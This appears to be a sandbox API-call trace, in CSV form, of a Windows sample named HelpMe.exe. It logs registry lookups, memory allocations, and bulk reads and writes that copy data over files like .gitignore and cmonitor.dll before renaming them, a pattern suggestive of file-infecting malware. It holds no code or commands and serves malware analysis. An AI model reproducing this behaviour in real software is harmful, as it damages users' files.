"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000190","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001a0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001a8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001b0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes\CLSID"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001b8","lpValueName->REGDBVersion"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x000001b8","lpFileName->C:\WINDOWS\Registration\R000000000007.clb","dwDesiredAccess->GENERIC_READ"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001b8","nNumberOfBytesToRead->22512"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001b8","lpValueName->REGDBVersion"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00300000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00000000","dwSize->65536","flAllocationType->0x00002000","flProtect->0x00000001"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00300000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00300000","dwSize->4096","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ba","hKey->0x0000014a","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001ba","lpSubKey->TreatAs"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001c6","hKey->0x0000014a","lpSubKey->(null)"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ba","hKey->0x000001c6","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ca","hKey->0x000001ba","lpSubKey->InprocServer32"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001ca","lpValueName->InprocServer32"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001ba","lpSubKey->InprocServerX86"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001ba","lpSubKey->LocalServer32"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ca","hKey->0x000001ba","lpSubKey->InprocServer32"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001ca","lpValueName->(null)"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001ba","lpSubKey->InprocHandler32"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001ba","lpSubKey->InprocHandlerX86"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001ba","lpSubKey->LocalServer32"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001ba","lpSubKey->LocalServer"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ca","hKey->0x000001c6","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001ca","lpValueName->AppID"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ba","hKey->0x000001c6","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ba","hKey->0x000001c6","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ca","hKey->0x000001ba","lpSubKey->InprocServer32"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001ca","lpValueName->ThreadingModel"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ba","hKey->HKEY_CLASSES_ROOT","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001ba","lpSubKey->TreatAs"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001c8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->0x000001c8","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001cc","lpValueName->Generation"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ce","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ca","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001ca","lpValueName->DriveMask"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001cc","lpValueName->AllowFileCLSIDJunctions"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->47554"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->47554"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000011c","nNumberOfBytesToRead->71"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->71"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->268"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->268"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\cuckoo\additional\.gitignore"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x0000011c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000011c","lpValueName->Personal"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x0000011c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegSetValueExW","SUCCESS","","hKey->0x0000011c","lpValueName->Personal","dwType->1","lpData->C:\Documents and Settings\janettedoe\My Documents","cbData->100"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x0000011c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000e4","hKey->0x0000011c","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e4","lpValueName->Generation"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\cuckoo\additional\.gitignore.exe","lpNewFileName->C:\cuckoo\additional\.gitignore"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x0000013c","lpFileName->C:\cuckoo\dll\cmonitor.dll","dwDesiredAccess->GENERIC_READ"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->268"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x0000013c","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x0000011c","lpFileName->C:\cuckoo\dll\cmonitor.dll","dwDesiredAccess->GENERIC_READ"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000140","lpFileName->C:\cuckoo\dll\cmonitor.dll.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->47554"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->47554"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x000001d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001d0","lpValueName->Common Documents"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x000001d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegSetValueExW","SUCCESS","","hKey->0x000001d0","lpValueName->Common Documents","dwType->1","lpData->C:\Documents and Settings\All Users\Documents","cbData->92"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001d0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001d4","hKey->0x000001d0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001d4","lpValueName->Generation"
